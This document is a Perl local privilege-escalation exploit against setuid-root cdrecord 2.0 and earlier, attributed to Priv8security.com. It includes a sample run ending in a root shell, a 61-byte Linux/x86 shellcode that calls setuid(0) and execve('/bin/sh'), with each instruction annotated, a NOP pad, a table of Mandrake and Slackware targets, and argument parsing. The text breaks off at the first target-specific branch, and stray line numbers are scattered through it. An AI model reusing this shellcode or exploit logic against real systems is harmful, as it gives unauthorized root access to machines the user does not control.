1 #!/usr/bin/perl
###########################################################
# Cdrecord 2.0 and earlier: local root exploit.
#
# Only useful where /usr/bin/cdrecord is installed setuid root (target 3
# below notes that Slackware's is not). In the sample run the address
# printed as "Mr .dtors" appears to be a per-target .dtors address; the
# "Make sure you are root" line is cdrecord's own error output.
#
# [wsxz@localhost buffer]$ perl priv8cdr.pl 4
# Using target number 4
# Using Mr .dtors 0x808c82c
# Cdrecord 2.0 (i586-mandrake-linux-gnu)
#
# scsibus: -1 target: -1 lun: -1
# Warning: Open by 'devname' is unintentional and not supported.
# /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver.
# /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.
# /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'.
# sh-2.05b# id
# uid=0(root) gid=0(root) groups=503(wsxz)
# sh-2.05b#
#####################################################
20
21
# Linux/x86 payload, 61 bytes: setuid(0); setgid(0); execve("/bin/sh", ...); exit.
# The execve stub is the classic jmp/call self-locating variant: at run time it
# writes the argv pointer and a NUL terminator into its own buffer (mov [esi+8],esi;
# mov [esi+7],al), so the memory the payload lands in must be writable.
# Byte sequence is unchanged; it is only split by instruction group for readability.
$shellcode = join '',
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80",                   # eax=0; ebx=0; al=23 (setuid); int 0x80
    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80",                   # ebx=0; eax=ebx; al=46 (setgid); int 0x80
    "\xeb\x1f\x5e",                                       # jmp to the call below; pop esi -> "/bin/sh"
    "\x89\x76\x08\x31\xc0\x88\x46\x07",                   # [esi+8]=esi (argv[0]); eax=0; [esi+7]=0 (NUL)
    "\x89\x46\x0c",                                       # [esi+12]=0 (argv[1] = NULL)
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80",   # al=11 (execve); ebx=esi; ecx=esi+8; edx=esi+12; int 0x80
    "\x31\xdb\x89\xd8\x40\xcd\x80",                       # ebx=0; eax=1 (exit); int 0x80 -- only if execve fails
    "\xe8\xdc\xff\xff\xff",                               # call back to the pop esi
    "/bin/sh";
28
29
# Binary being attacked. The sample run in the header shows the error text
# coming from this exact path.
$cdrecordpath = '/usr/bin/cdrecord';

# One-byte x86 NOP, used as padding around the payload.
$nop = chr 0x90;

# Tuning value used by the target-specific code further down (not visible here);
# starts at 0 and may be overridden by the optional second command-line argument.
$offset = 0;
32
33
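# Known targets: number => description shown in the usage text. The keys are the
# only values accepted as the first argument; the per-target setup follows below.
%target_desc = (
    1 => 'Linux Mandrake 8.2 Cdrecord 1.11a15',
    2 => 'Linux Mandrake 9.0 Cdrecord 1.11a32',
    3 => 'Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!',
    4 => 'Linux Mandrake 9.1 Cdrecord 2.0',
);

# Print the banner, the usage line and the target list, then exit non-zero.
# Uses print rather than printf so a '%' in $0 cannot be misread as a format.
sub usage {
    print " Priv8security.com Cdrecord local root exploit!!\n";
    print " usage: $0 target [offset]\n";
    print " List of targets:\n";
    for my $n (sort { $a <=> $b } keys %target_desc) {
        print " $n - $target_desc{$n}\n";
    }
    exit(1);
}

# Argument handling: a listed target number is required, an integer offset is
# optional. Sets the globals $target and $offset used by the code that follows.
usage() unless @ARGV == 1 || @ARGV == 2;

$target = $ARGV[0];
usage() unless exists $target_desc{$target};   # reject anything not in the list

if (@ARGV == 2) {
    # Only override the default when an offset was really given; the old code
    # assigned $ARGV[1] unconditionally, clobbering $offset = 0 with undef on a
    # one-argument run.
    usage() unless $ARGV[1] =~ /^-?\d+$/;
    $offset = $ARGV[1];
}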
47
48 if ( $target eq "1" ) {
49 $r